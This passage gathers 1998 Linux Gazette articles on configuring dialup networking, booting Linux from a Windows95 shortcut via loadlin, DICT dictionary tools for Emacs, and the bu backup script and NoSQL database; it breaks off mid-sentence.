Just as a person who speaks only French will have a great deal of difficulty communicating with a person who speaks only English (no matter how loudly or slowly each one talks), so too will two dissimilar networks be unable to communicate without a common language or protocol.

 

Grossly oversimplified, in the context of the Internet, this language is TCP/IP. (Yes, I know, it really happens through a series of functions based loosely on the OSI model, but for the purposes of this document, let us agree that TCP/IP is the language of choice.)

 

TCP/IP is based on numerical addresses, called IP addresses. I'm sure you have all seen something like xxx.xxx.xxx.xxx, where x is equivalent to some numerical value. A practical example would be 204.252.102.2, one of the Domain Name Servers, or DNS (more on this later), at an ISP here in town.

 

"But wait a minute, I don't type stuff like that, I type the ubiquitous dub dub dub dot foobar dot com thingy, (www.foorbar.com) and it works just dandy. What's up with this number stuff?"

 

Ah, grasshopper, this is where DNS comes in to play.

 

Through an interconnected system of servers, the DNS system functions much like an upside down pyramid.

 

Starting with your local DNS, which knows only about the machines on your local network (and how to talk to a machine higher up the totem pole if it gets confused), all the way up to the widest part of the pyramid, which contains the information for the various master or "root" domains such as .com, .net, .edu, or .org, a huge and constantly changing database of all machines connected to the Internet is organized, collated, and sorted 24 hours a day.

 

Again, grossly oversimplified: residing on the DNS servers, in the form of something called "zone files", each machine on the relevant local network has two entries - an IP address and a hostname. In this article your machine's hostname will be tester and your domain will be foober.net (these will need to be replaced with information gathered from your Internet Service Provider, as explained later). This is called address resolution, and explains how the dub dub dub deal works.
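For illustration, a hypothetical fragment of such a zone file, using the made-up names above (the address is invented as well):

; forward zone fragment for foober.net (hypothetical)
tester   IN  A      10.1.2.3
www      IN  CNAME  tester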

 

Whenever a request goes out, these dandy little machines translate the hostname you have requested into an IP address if it is on your local network, or pass it on up the line if it is not. Pretty neat, huh?

 

For the purposes of this document, the three components of your networking setup will consist of the following:

 

  1. The network interface in your case will be a thing known as the loopback adapter.
  2. The physical connection will be your phone line.
  3. The protocol you will use will be TCP/IP in one of two configurations, depending on your Internet Service Provider (ISP.)

 

Preparing for the networking configuration.

  1. Some information for you if you do not already have an ISP.
  2. Some information for you if you already do have an ISP.
  3. General information required in either scenario.

 

Some information for you if you do not already have an ISP.

As long as we are at this, and with the proliferation of every Tom, Dick, and Harry starting "The Ultimate Internet Service Provider," I provide the following things to consider when choosing an ISP:

 

I will present these considerations in question form, with explanations where necessary. These things are VERY important to know if you want to maximize your effectiveness on the Internet.

 

Initially, you will probably be connected to a salesman when you contact a prospective ISP. Ask to talk to a tech, or have one conferenced in on the call. Otherwise, the salesman may promise you anything to get you connected. The tech will be able to answer the following questions effectively. If the salesman or the tech refuses to do any of the above, or hems and haws about any of these questions, thank them for their time and move on. This is not an ISP you want. So hang on to your modem, here we go:

 

 

Some information for you if you already have an ISP.

You should be okay, at least at the basic functionality level, if you have already been connected successfully to your present ISP. However, if you have been connecting using only Windows machines, you may or may not have problems with connecting the Linux box. See the NOTE and SPECIAL NOTE below regarding NT-specific issues.

 

General Information required in either scenario.

Before you do anything, you will need to acquire the following information from your ISP:

 

NOTE: Each ISP has its own idiosyncrasies and procedures for accessing its service. What I will be accomplishing in this document is simply to get you physically logged in and connected to the ISP. There may or may not be additional steps required by your particular service to attain full functionality.

 

SPECIAL NOTE: Many ISPs unwisely, in my opinion, rely on NT architecture for remote access. This adds additional steps to your configuration, many proprietary to Microsoft and otherwise unnecessary. If your ISP is one of these shops, try to get a tech on the line while you are doing the configuration. If they are unwilling or unable to support Unix and Linux machines, find an ISP who will. The ease of the configuration will be worth it, as will having "shell" access to your ISP's network, with which you can do all sorts of neat things, covered in the "stupid network tricks" section later.

 

Even so, look at my "cheat" section for some ideas and workarounds if your ISP is unwilling or unable to support your Linux box.

Configuring the loopback adapter.

The loopback adapter is necessary for the networking connection to function. Oversimplified: each network connection, or "interface" in UNIX parlance, must be "bound" to a physical as well as a logical adapter. The loopback adapter performs this function in the absence of an actual interface to the network, such as a Network Interface Card, or NIC.

 

We will use the loopback adapter both for testing and as the place to "bind" the connection to your ISP, thus making your modem the network interface.

 

Slackware 3.5:

This should be done for you during the installation. If not, from the command line type netconfig <return>, and when prompted choose 127.0.0.1 for your network interface.
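If you would rather set the loopback up by hand, the classic recipe (essentially what the NET-3 HOW-TO listed in the resources section gives) amounts to something like this:

ifconfig lo 127.0.0.1
route add -net 127.0.0.0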

 

RedHat 5.1:

Again, this should have been taken care of during the installation procedure. If not, start X and choose Control Panel/Network Configuration, then at the bottom of the dialog box choose Add and follow the prompts.

 

Configuring basic networking.

Slackware 3.5:

Basic network configuration is accomplished either by directly editing the configuration files themselves, by using the netconfig utility, or by some combination of both methods.

RedHat 5.1:

Most of your network configuration can be accomplished through the aforementioned Control Panel/Network Configuration method, or using the linuxconf utility available on newer RedHat systems. You will find this utility under Start/Programs/Administration/Linuxconf.

 

Basically, you just need to edit /etc/hosts and choose a hostname and domain for your machine. The default is darkstar or something like that in Slackware, and localhost in RedHat. The important points to remember here are not to choose a hostname that is already on the Internet, and to use your ISP's domain name for yours. So, if your ISP is psi.net:

 

darkstar.psi.net

 

At a minimum, if you are not connected to a LAN and will only be dialing up to your ISP, the only entry required in your /etc/hosts file is your loopback adapter.
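A minimal /etc/hosts for such a dialup-only machine, using the example names from the beginning of this article, would look something like this (the fields are separated by tabs):

127.0.0.1	localhost	tester.foober.net	tester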

 

Connecting to your Internet Service Provider.

Slackware 3.5:

If you have followed my instructions previously, and chose the proper ISP, get him on the line and have him walk you through the configuration process, as it will be unique to each ISP.

 

If not, read on for some general pointers.

The symlink to /dev/modem should have already been created during installation; if not, create it.
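For example, if your modem is on COM2 (substitute whichever port yours actually uses):

ln -s /dev/cua1 /dev/modem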

To begin with, you will have to connect manually using minicom to see just what your ISP requires.

 

minicom <return>

 

After it gets done griping about not running as root, enter the configuration menu by pressing Alt+Z, then choose the proper configuration options. When finished, exit and save your changes as the default when prompted.

 

You should now see an OK prompt in the terminal window. If not, go back and check your configuration.

 

Now let's dial your ISP:

 

ATDTyourispaccessnumber

 

For instance:

 

ATDT 3659968 <return>

 

If all goes well, you should be presented with a login prompt. Enter your ISP assigned username and press the return key. Next you should be prompted for your password. Enter your ISP assigned password.

 

At this point, if all has gone well, you should start to see a bunch of garbage scroll across your screen. This is a good thing. This is the ppp daemon on the other end trying to connect to your machine.

 

To talk to it, we will first have to close minicom WITHOUT resetting the modem. Next we will have to start our own ppp daemon. I happen to stink at typing, so I made a little script to initiate the pppd connection:

 

vi unicom.connect <return>

 

pppd /dev/modem crtscts defaultroute

(or, as I prefer, /dev/cua1 for COM2 in place of /dev/modem)

 

now let's exit and save the file:

 

Press the Esc key to enter command mode, then press Shift + : followed by wq <return> to write and quit the file.

 

Now, let's make the file executable (like a .EXE file in DOS) by issuing the following command:

 

chmod +x filename (unicom.connect in this example.)

 

Okay! Now we are ready to go. At some point while we were doing all this, minicom should have crapped out. If not, press Alt+Z and this time DO reset the modem.

 

Here we go:

 

  1. Start minicom.
  2. Dial your ISP.
  3. Enter your login when prompted.
  4. Enter your password when prompted.
  5. As soon as the garbage starts, depress Alt+z, then q to quit without resetting the modem.
  6. As soon as the command prompt comes back, run your connect script. In this example unicom.connect.
  7. Type ifconfig and press return. You should now see TWO entries: one for the loopback adapter, and one called ppp0 or something similar (see the quick checks after this list).
  8. Jump up and down and do the happy dance. You are connected!
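
For reference, here are the checks from step 7 as commands, plus a first test ping; the nameserver address is the illustrative one used later in this article, so substitute one of your ISP's machines:

ifconfig
netstat -r
ping -c 3 196.356.2.4

ifconfig should show both lo and ppp0, and netstat -r should show a default route pointing at ppp0.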

 

RedHat 5.1:

If you have followed my instructions previously, and chose the proper ISP, get him on the line and have him walk you through the configuration process, as it will be unique to each ISP.

 

If not, read on for some general pointers:

First, if you haven't done so already, find out which serial port your modem is connected to - you will need this information. If it has not already been done, use the modemtool from the Control Panel to create a symbolic link from that serial port to /dev/modem. Alternately, you can enter the port directly into the dialog box when prompted, as described below.

 

Generally speaking, the symlink to /dev/modem seems to be the way to go, so I won't go into why I don't use it. However, in any case you should know which COM port it resides on just in case you run into trouble, so:

 

COM1: /dev/cua0 or /dev/ttyS0

COM2: /dev/cua1 or /dev/ttyS1

Etc.

 

RedHat users, provided they do not require any off-the-wall configuration options, have it pretty easy here. Simply choose Control Panel/Network Configuration/Interfaces, then choose Add. Choose PPP when prompted for the interface type. Next, enter your ISP access number, login name and password.

 

Should your modem require any special customization, choose Customize from the dialog box. When you are finished, choose save and quit, then activate the interface either by highlighting the ppp0 entry in the Network Configurator, or on newer systems, you may use the Usernet tool located in Start/Programs/Networking. If all goes well, your modem should squeal like a pig for a moment, login, and then you should be off and running!

 

Configuring the Domain Name Service to function on a dialup connection.

This is fairly simple. We simply need to tell the Linux box to let the ISP's DNS resolve hostnames for us. First, if you are currently running named (the daemon) or BIND (the collection of programs that makes named work), edit /etc/host.conf and make sure there is a line similar to the following contained there:

order hosts, bind

 

Now, let's tell the resolver (a magic little fellow constantly zipping around the guts of the machine looking things up,) how to find the outside world and talk to it.

 

From a term window or command prompt, edit /etc/resolv.conf, then add your ISP's nameservers using the following syntax:

 

nameserver <space> IP Address of the nameserver

 

For instance:

nameserver 196.356.2.4

nameserver 196.356.2.5

 

NOTE: the DNS machines will be searched in the order they are entered into the file, so put your ISP's primary first, secondary second.

 

During the configuration process your respective setup program may have added additional information to this file. If so, comment those lines out by placing a pound sign (#) in front of each line.

 

To prevent a flood of e-mail on this, yes, I am aware there are many directives you can use here, and many DNS things such as a caching-only server you can employ to enhance the performance of the resolver, and these things will be covered in a later installment, so be patient.

 

 

Configuring Sendmail to function on a dialup connection.

Sendmail, like DNS, is an art unto itself. However, here are some general suggestions:

 

Cd to /etc/

Edit sendmail.cf, and look for lines like the following:

# "Smart" relay host (may be null)

DSyour.isp.mailmachine

 

Next look for these:

#who do I send unqualified names to (null means deliver locally)

DRyour.isp.mailmachine

 

#who gets all local email traffic ($R has precedence for unqualified names)

DHyour.isp.mailmachine

 

Finally, you may or may not want to use the following directive - read the docs.

 

#who do I masquerade as (I forget the rest of it, just look for the masquerade keyword.)

DMyour.isp.domain.name
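
Pulled together, and assuming purely for illustration that your ISP's mail machine is called mail.psi.net, the edited lines would read:

# "Smart" relay host (may be null)
DSmail.psi.net

#who do I send unqualified names to (null means deliver locally)
DRmail.psi.net

#who gets all local email traffic ($R has precedence for unqualified names)
DHmail.psi.net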

 

Testing and troubleshooting your basic and dialup configuration.

On the connectivity side, usually it's a pass/fail operation. Either you get connected or you don't. Check /var/log/messages for some possible clues as to what went wrong.

 

If you connect, but can't do anything, it could be a thousand things, but here are some general guidelines to diagnose the problem:

  1. Can you ping the outside world by IP address? If yes, proceed. If no, something is wrong with your connection or the way it was set up. ifconfig and netstat -r can be of help here.
  2. Can you ping the outside world by hostname? If yes, proceed; if no, you have a name resolution problem. Check your resolv.conf and make sure that your ISP's DNS machines are the only things in there. Check your hosts file and put your local info there. Make sure your local host (loopback) has an entry.
  3. Do you get connected, but sometimes lose your connection while reading stuff, or otherwise appear to have no activity on your line? Your ISP is probably running an automatic termination program, AKA a "serial killer," to prevent a line being locked up when a user's modem does not exit cleanly. While some ISP's frown upon it, the way around this is to run a "ping-forever" or keepalive shell program to defeat the timeout script (a minimal sketch follows this list).
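
Here is a minimal "ping-forever" sketch; the address is the illustrative nameserver from the DNS section, so point it at one of your ISP's machines instead, and check your ISP's policy first:

#!/bin/sh
# one ping a minute keeps the serial killer away
while true
do
    ping -c 1 196.356.2.4 > /dev/null 2>&1
    sleep 60
done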

 

Some quick and dirty "cheats" if all else fails.

If you have trouble getting Sendmail to retrieve your incoming mail and news from the outside world, simply use Netscape to access your incoming mail on your ISP. Provided you enter the correct information into the dialog boxes, Netscape has its own POP3 interface and doesn't need anything else.

 

Stupid Network Tricks.

 

Coming next month: Connecting your Linux machine to a network and making it an Internet Gateway for your other machines!

 

Resources for further information.

The Linux Documentation Project:

http://sunsite.unc.edu/LDP/

General Networking:

Network Administrator's Guide, System Administrator's Guide, and the NET-3 HOW-TO

The Linux User's Guide

DNS HOW-TO

ISP Hookup HOW-TO

 

Additionally, OS specific information can be found at the following websites:

Slackware 3.5:

http://www.cdrom.com/

RedHat 5.1:

http://www.redhat.com/

 

Finally, check the comp.os.linux* newsgroups, or drop me an e-mail.

 


Previous ``Linux Installation Primer'' Columns

Linux Installation Primer #1, September 1998
Linux Installation Primer #2, October 1998


Copyright © 1998, Ron Jenkins
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Loadlin.exe Installer

By


This makes a loadlin.exe button on a Windows95 desktop

How many times have you sat and waited for Windows to shut down while you rebooted? How many times have you read that "Please wait..." message? If I show you how to reboot in under one minute will you give it a try? Rhetorical questions all, yet there is a need for a fast reboot out of Windows if only to preserve your even temper and a sense of decorum. This little piece will install loadlin as your linux boot program and get you out of the Windows environment in under one minute. The by-product will be a login prompt for linux. I hope I do not get any complaints about this blatant effort to undermine the monopoly OS.

RedHat 5.1 can do this thing

Just about all linux distributions can do this little loadlin button on the desktop of DOS 7.0. The odd cat in the bunch is RedHat; an example is that they insist on loading up the /usr directory when /usr/local will do nicely. They have some quirks, but don't we all? This article fires up RedHat 5.1 and makes them fit in.

The RedHat installer will offer you a chance to add 'DOS and Windows connectivity'. Do it. This will let you mount the old DOS partition from linux and also allow you to copy your kernel image (vmlinuz) to a directory on the DOS partition to be booted by loadlin.exe.

The official RedHat position on LILO is a good one. They always offer to put LILO on the master boot record or the first sector of the first partition. This gives you a solid base to make your bootings work. They also let you skip the LILO installation.

Skip LILO

To use loadlin.exe, we will first skip LILO. The prompt in the RedHat installer asks you where to install LILO and I put the asterisk on the 'first partition' choice and Tab to the 'skip' choice and hit Enter.

When you startx, the control panel's linuxconf program (System Configuration) gives you a chance to set the 'Config-boot mode-LILO defaults' for your machine. Make sure that the 'LILO is used to boot this system' button is left 'up'.

All hail thenerd and his incessant questions!

(I got this idea from 'thenerd' in Portage la Prairie, Manitoba. The parents who own the machine did not want anything to change in the way that they played with their DOS. They did not want to have any changes in the bootup of their machine. So, if we boot from DOS to linux, they will never know about or see any 'LILO boot:' messages and they can remain fossilized.)

Make a bootdisk please

The RedHat installer asks you nicely if you will be making a boot disk and you will always answer 'yes'. Do not pass go. Go directly to 'yes'. You will thank me if you get those 'signal 11' errors (a whole other article). The beauty of this bootdisk is that you can experiment with boot time options for the kernel. Once you get linux rolling you can make a boot disk with the mkbootdisk command.

Fasten seatbelts during re-entry

After the install is complete, you will be rebooted. Pull out the boot disk because we are going back to DOS to set up the boot button. Since we do not have LILO on the master boot record, the system will boot DOS as usual. Yes I have made a big assumption about you installing linux AFTER the DOS is installed. It only makes sense when dealing with a predatory OS like DOS to let it think it has the whole system to itself. Once the master boot record is erased and overwritten by DOS you then can install a more sophisticated system like linux.

Special note on PartitionMagic 4.0

Direct from the technical support guru Will Erickson at powerquest.com: "PartitionMagic 4.0 does fully support Linux ext2 partitions. It is able to re-size them without any problems."

This is also the program to get for re-sizing your single FAT32 partition into something more reasonable, like maybe a linux web server and a personal linux workstation as well as a DOS game machine.

"The illegal operation occurred in this directory, Mr. Gates."

The directory for your linux kernel is your choice. Make one called 'c:\linux\kernels' and you can copy the 'linux.bat' verbatim. Now that we have a place for loadlin.exe to work, put it IN THE PATH. Do this by putting it in a DIRECTORY that is in the path. I already have a 'c:\utils' directory on the path and that is where you will find loadlin.exe.

The batch

The edit program works nicely for this batch file writing, but notepad will work for those of you without the command prompt. Here is the abbreviated linux.bat:

rem This ensures that any unwritten disk buffers are flushed

smartdrv /C

rem This loads up the kernel and boots linux

loadlin c:\linux\kernels\vmlinuz root=/dev/hda2 ro

Root equals what?

The '/dev/hda2' assumes that your linux boot partition is the second one on the first hard disk. Your special and unique installation gets entered as the 'root=your_root_partition_here'. The 'ro' will mount it 'read only' and that is just standard procedure. Do not make it 'rw' if you have not read about what pitfalls await.
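
If you are not sure what to put after root=, one quick way to find out, once you have booted linux from your boot disk, is the standard df command:

df /

The Filesystem column of the output shows the device your root partition lives on, for example /dev/hda2.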

Special linux power

My RedHat 5.1 partition is booting happily from /dev/hdc9, which is nowhere near inside the 1024 cylinder limit; in fact it is 2 gigabytes past it. It is also on an extended partition, in what is called a logical partition as opposed to a primary partition. The linux system of GNU components has got to be the most super-powered and adaptable OS on the market. It is booting, without help from the BIOS, from a logical partition in an extended partition that is 2 gigabytes over the 1024 cylinder limit. This is because loadlin.exe was developed by the linux web hacker method, and the kernel folks and the LILO folks were included in the process. It is a powerful development model.

What is vmlinuz?

The vmlinuz is not there yet. It is the name you will give to your kernel image. We need to use the boot disk in a moment so that we can put a kernel in 'c:\linux\kernels'.

Save your 'linux.bat' in a directory ON THE PATH. I already have a 'c:\batches' directory that holds '.bat' files and this is where you will find 'linux.bat'.

The shortcut

At the DOS 7.0 desktop (Windows95 is just a window manager for DOS 7.0) you will now right click your rodent for the momentous creation of a new shortcut. Select your new 'linux.bat' with the 'browse' button beside the little command line window. Choose 'open' and it will be entered as the command line for your new shortcut.

Do a right click with your rodent on the new shortcut and select 'properties'. Then select 'program' and then the 'advanced' button. You need to make sure that your new batch will use the MS-DOS mode. You also need to use the current configuration, whatever that may be. The job is done.

Also give Microsoft a bit of credit for letting you choose a different icon.

The icon

If you right click your rodent on your new shortcut, the menu item 'properties' will get you to the 'change icon' button. Push de button and make it go. The choices are very nice and I have a personal attachment to the 'dynamite' icon. Perhaps you will choose the lightning bolt. Suffice it to say that what is about to happen to Windows is very swift and violent. My icon shows a detonator and some red sticks of dynamite and it is labelled 'LINUX'. It looks ominous and tempting, especially when Windows gets itself into a jam.

The last look at 'that message from Gates'.

You know, since I have installed the LINUX button, I use it to shut down Windows. The best part of this trick is that since I started using the LINUX button I have not seen 'that message'. You have seen it and you are just as ticked off by it as the rest of us. It says "It is now safe to turn off your computer." This one and that infernal "Your program has performed an illegal operation and will be shut down" message are probably the most offensive and arrogant messages from a supplier to its clients in the history of business relations. I thank the boys in Redmond, Washington for offending so many nice people. We are enjoying our linux boxes so much more when we reflect on the nice manners of our fellow travellers.

Time to test our work:

  1. make a new linux box without LILO
  2. make a boot disk for linux
  3. boot to DOS
  4. make a directory for the kernel
  5. write a batch file for loadlin.exe
  6. put the batch file on the path
  7. copy loadlin.exe to a directory on the path
  8. make a shortcut to the batch file on the desktop
  9. select or make a groovy icon for the shortcut
  10. select 'shutdown windows' for perhaps the last time
  11. boot the boot disk to linux
  12. read the rest of this drivel

The rest of this drivel

Now that the boot disk has you in linux, you "log in". You did remember your password and you are now called 'root' by your staff. Type the mc command and Enter. You will now be using mc (Midnight Commander) to finish the job.

The arrow keys will take you to '/boot'. Select 'vmlinuz-2.0.34-0.6' and then press Tab. Your cursor will jump to the other window.

Now we will actually do some 'linuxing'. Enter this:

mkdir /dos

Then Enter this:

mount -t vfat /dev/hda1 /dos

This '/dev/hda1' assumes that this is your DOS partition. Your special and unique setup will be entered as the "/dev/your_DOS_partition_here". It gets mounted on the /dos directory that you just created.

Then Enter this one:

cp /boot/vmlinuz-2.0.34-0.6 /dos/linux/kernels/vmlinuz

Oh yeah? Eat LeftAlt-F2!

Once these little commands are done, you will be able to navigate over to the '/dos' directory where your DOS partition is now visible and accessible from linux. Cool, eh?

If things are just too busy on the mc screens, you can hold Ctrl and press the letter 'o' to get back to the shell prompt. Ctrl-o again to get back to mc.

If you want to read documents and switch back and forth you can hold LeftAlt and press F2 to open another console; a virtual console. LeftAlt-F3 opens a third console. You get 64 of them with linux. Just log in again and fire up another version of mc or lynx or whatever. To get back, you select LeftAlt-F1. Four or five consoles should keep the average 'frantic reader' happy.

Copy the kernel to vmlinuz

The mc cursor is put on the kernel. It is in '/boot' and it is called 'vmlinuz-2.0.34-0.6' in RedHat 5.1. Tab to get your cursor into the other window. Here is why there are two of those windows:

"You get to see what you are doing."

Navigate to the '/dos' directory and then to the '/linux/kernels' directory.

Make sure the cursor is on the kernel. Tab over there now.

The kernel is highlighted in one window in '/boot' and the other window is in '/dos/linux/kernels'.

"F5 copy on two. Block somebody! Ready, break!"

Press F5. Voila! You get the copy window and all you have to do is hit Enter. The result? You now have a kernel image with the wrong name in the DOS partition.

Better yet, before you hit 'enter', type in the new name of your kernel:

/dos/linux/kernels/vmlinuz

The command line for these fiddlings is this:

cp /boot/vmlinuz-2.0.34-0.6 /dos/linux/kernels/vmlinuz

But I already did that

Caught me again. Yes, I got you to do something two different ways. Welcome to linux. Forgive me. I need you to open up your 'brain pathways', you see. The very best part of linux for me and a whole crew of other linuxians is that the computer is fun again. Isn't that why you got one in the first place?

The force is with you

Well, we have put a 'vmlinuz' kernel image in the DOS partition. Time to reboot.

Do NOT use the reset button. Your file system needs to be cleanly unmounted. Linux can 'fsck' and fix its way out of trouble but why tempt fate?

Type in this powerful command:

shutdown -r "now" (it also works without the quotes) This one does the reboot.

More power: shutdown -h "now" (this one does the halt of everything so you can turn off the machine)

Alternatively, RedHat and other distributions have implemented the 'Vulcan nerve pinch' so that folks switching from the 'crashing OS' can use Ctrl-Alt-Del to reboot.

Boot to DOS to boot to Linux

The Windows95 machine lets you select plain DOS mode at boot up. If you are just so impatient to see your test results, then boot to plain DOS mode.

Type in this fateful command:

linux

If you do want to see the fun stuff, let DOS do the bootgui thing all the way to the desktop.

"Thar she blows"

Sitting on your desktop is the ultimate affront to the 'powers that be' at Microsoft. Push that button and you destroy fifteen years of monopolistic avarice. Push that button and declare your right to freedom of expression. Push that button and stand up and be counted. Push that button and boot linux.

That about wraps it up from this desktop. Adios. Dynamite that sucker!

Reference reading and links:

BootPrompt-HOWTO - required reading for all linuxians

Bootdisk-HOWTO

Loadlin+Win95 mini-HOWTO

The RedHat Linux Installation Support FAQ - good basic stuff here

The Boycott Microsoft Page at www.vcnet.com/bms/

The home of RedHat at www.redhat.com

The home of PartitionMagic 4.0 at www.powerquest.com

Windows footnote

It is a good idea to close all other programs before pushing your LINUX button. The boot process takes about three seconds before you are uncompressing linux and an elapsed time of 58 seconds to the login prompt. Your mileage may vary. Your DOS file system is left a-ok and properly 'unmounted', if it is correct to talk about a rebooting 'crashing OS' that way.

Example: I have seven little programs running at startup and I added Netscape and an editor. Then I pushed the LINUX button. Elapsed time to the linux login prompt was 65 seconds.

Make sure you save your work before you hit that button!

Booting footnote

If the darn thing won't 'mount -t vfat' the /dos partition, it probably can not find the module dependencies file in '/lib/modules/preferred'. This is no sweat. Type this:

man symlink

Read the manual page for symlink. Then cd to '/lib/modules' and make a symlink called 'preferred' that points to your '/lib/modules/your_kernel_name_here'.

The command line for this is:

ln -s /lib/modules/your_kernel_directory_name_here /lib/modules/preferred

(note the single space between the two paths)

This is very easy with mc. Start with the mc command. Navigate over to '/lib/modules'.

Put the cursor on the '/lib/modules/your_kernel_name_here' directory.

Type F9, then f (for file), then s (for symlink), then arrow down to 'Symbolic link filename:'.

Enter this:

/lib/modules/preferred

Then Enter this:

depmod -a

The job is done.

It is ok to delete it and redo it if you wish. Also, you can 'Esc-Esc' the Symlink window to cancel.


made with GNU Emacs 20.2.1 on an i486
running RedHat 5.1 Linux 2.0.35-2
No animals were eaten during the testing of these procedures.
All references to Mr. Gates are purely intentional.


Copyright © 1998, Bill Bennet
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Dict Continued

By


Last month I wrote about the DICT client-server protocol, a GPL-licensed system for looking up words in a variety of dictionary databases. I received some feedback from Rik Faith, DICT's primary developer, in response to my statements concerning the server's memory usage. Here is a quote from the message:

In your review, you mention that dictd requires a lot of memory to run, and suggest that people may not want to run the service all of the time. First, since dictd memory maps all of the files that it uses, ps may show that it is "using" far more memory than it actually is. I suspect that this may vary between kernel versions and ps, depending on how mmap'd memory is reported. Second, dictd doesn't do anything when it is waiting for a socket connection, so the memory it uses will be swapped out over time. Hence, I think it should be fine to start dictd at boot time and to leave it running -- I do this on my underpowered laptop and it works out ok in the sense that dictd doesn't use any resources when it is not responding to queries. If you happened to notice a situation where a waiting dictd is using cpu time, then that's a bug that I'd like to fix.

Thanks for your review of dict-related software -- I hope we can improve dictd and related tools a great deal over the next 6-12 months.

I was curious about the dictionary index files and just how they had been generated. In response to my query, Faith responded:

We currently write one-off scripts for each input database. These sources are all distributed on the ftp site. We are moving toward a dictionary interchange format (DICF) from which indexes will be automatically generated. But one-off scripts will still be required to convert the databases into DICF format. We expect, however, that a large amount of new material will be written directly in DICF. Our plan was to have DICF ready by 4Q1998, but this schedule may slip.

When I first began to use the DICT system, it occurred to me that an Emacs mode would be useful, so that a keystroke would open up a window showing definitions of the word under the cursor. Some time later I was browsing the gnu.emacs.sources newsgroup and happened to find two independently developed dict.el files, both functional but with slightly different features.

Alexander Vorobiev's version was the first one I tried. It works well under both GNU Emacs and XEmacs. This dict.el doesn't have any mouse bindings included, but does have a feature I appreciate: rather than directly sending the input word to the dictd server, the word first appears in the mini-buffer at the bottom of the screen, allowing it to be edited first. For example, this can be useful if you would like the singular rather than the plural form of a word defined, or if the definition of a phrase is sought.

The other dict.el was written by Shenghuo Zhu. This one also will work on both emacsen, but the mouse-binding (button two looks up the word under the cursor) works only with GNU Emacs, though it probably wouldn't be too difficult to adapt it to XEmacs. Syntax-highlighting for GNU Emacs is also included.

Both modes allow a keystroke combination to be set for looking up a word; I've been using Control-c-Enter. Since the two files are small, I've bundled them into one gzipped tar archive and included them with this issue of the Gazette. You can find the file here. Instructions for installation of the modes can be found near the beginning of each file. In the archive you will find that one of the modes has been renamed dict2.el; before using that mode it should have its original name, dict.el, restored.

Dict-mode can even be used as a substitute for the Emacs Ispell spell-check interface. If a misspelled word is passed to the dictd server, a response such as this will be generated:


No definitions found for "arcive", perhaps you mean:
web1913:  Archive  Argive  Arrive
wn:  archive  Argive  arrive
foldoc:  archive

Of course Ispell is more suitable for spell-checking an entire buffer, but if a single word's spelling is doubtful, dict-mode offers an alternate solution.


Last modified: Wed 28 Oct 1998


Copyright © 1998, Larry Ayers
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


How Not To Re-Invent The Wheel

By


Introduction

With all of the excitement lately about various software firms planning Linux ports of their products, it's easy to lose sight of the great power and versatility of the unsung small utilities which are a part of every Linux distribution. These tools, mostly GNU versions of small programs such as awk, grep and sed, date back to the early pioneer days of Unix and have been in wide use ever since. They typically have specialized capabilities and become especially useful when they are chained together and data is piped from one to another. Often a shell script serves as the matrix in which they do their work.

Sometimes a piece of software native to another operating system is ported to Linux as an independent unit without taking advantage of pre-existing tools which might have reduced the size of the program and reduced memory usage. It's always a pleasure to happen upon software written with an awareness of the power of Linux and its native utilities. Bu is a backup program and NoSQL is an ASCII-table relational database system; what they have in common is their usage of simple but effective Linux tools to accomplish their respective tasks.


Shell-script Backups With bu

Making a backup of the myriad files on a Linux system isn't necessary for most stand-alone single-user machines. Backing up configuration and personal files to floppies or other removable media is normally all that is necessary, assuming that a recent Linux distribution CD and a CDROM drive are available. The situation becomes more complex with multi-user servers or with machines used in a business setting, where the sheer number of irreplaceable files makes this simple method impractical and time-consuming; in these cases the traditional method in the unix world has been to use cpio or another archiving utility to copy files to a tape drive. Though the price of hard disks has plummeted in recent years while their capacity has ballooned, reliable tape drives capable of storing the vast amounts of data a modern hard-disk can hold are still quite expensive, sometimes rivalling the cost of the computer they protect from loss of data.

Vincent Stemen has developed a small backup utility called bu which is shell-based and makes good use of standard Linux utilities such as cp and sed. Rather than being intended for backups to tape or other streaming device, bu is designed to mirror files on another file-system, preferably located on a separate hard drive.

Bu is just a twelve kilobyte shell script along with a few configuration files. It's remarkably capable; its feature list compares well with those of much larger backup utilities.

Bu in its earlier versions used cpio extensively, but due to a problem with new directory permissions cp is the main engine of the utility now. Cp -a used by itself can be used to bulk-copy entire filesystems to a new location, but the symbolic links would have to be dealt with manually, which is time-consuming. Also missing would be the ability to automatically include and exclude specific files and directories; bu refers to two configuration files, /usr/local/backups/Exclude and /usr/local/backups/Include, for this information.
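
For the curious, the bare-bones operation that bu builds upon looks something like this sketch (the paths are illustrative):

cp -a /home /backup/home

The -a switch preserves permissions, ownership, links and timestamps; what bu adds is the symbolic-link handling and the Include/Exclude logic just described.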

This small and handy utility isn't intended to completely supplant traditional tape-drive backup systems, but its author has been using bu as the basis of a backup strategy involving several development machines and several gigabytes of data. Bu can be obtained from this web-page; be sure to read the white paper included in the distribution which details the rationale behind the utility.


The NoSQL Relational Database

Carlo Strozzi (a member of the Italian Linux society) has developed a relational database management system (RDBMS) which uses tab-delimited ASCII tables as its data format. NoSQL is a descendant of an RDBMS developed by Walter W. Hobbs (of the RAND Organization) called RDB. The commercial product /rdb sold by Revolutionary Software is similar, but uses more compiled C code for greater speed.

Carlo Strozzi had this to say about his motivation for developing NoSQL (excerpted from the documentation):


Several times I have found myself writing applications that
needed to rely upon simple database management tasks. Most
commercial database products are often too costly and too
feature-packed to encourage casual use. There are also plenty of
good freeware databases around, but they too tend to provide far
more that I need most of the times, and they too lack the
shell-level approach of NoSQL. Admittedly, having been written
with interpretive languages (Shell, Perl, AWK), NoSQL is not the
fastest DBMS of all, at least not always (a lot depends on the
application).

The philosophy behind these database systems is well-expressed in an article titled A 4GL Language, which was written by Evan Schaffer and Mike Wolf, founders of Revolutionary Software. The paper originally appeared in the March 1991 issue of the Unix Review; a Postscript version is included with the NoSQL documentation. Here is the abstract:


There are many database systems available for UNIX. But almost
all are software prisons that you must get into and leave the
power of UNIX behind. Most were developed on operating systems
other than UNIX. Consequently their developers had very few
software features to build upon, and wrote the functionality they
needed directly, without regard for the features provided by the
operating system. The resulting database systems are large,
complex programs which degrade total system performance,
especially when they are run in a multi-user environment.

UNIX provides hundreds of programs that can be piped together to
easily perform almost any function imaginable. Nothing comes
close to providing the functions that come standard with
UNIX. Programs and philosophies carried over from other systems
put walls between the user and UNIX, and the power of UNIX is
thrown away.

The shell, extended with a few relational operators, is the
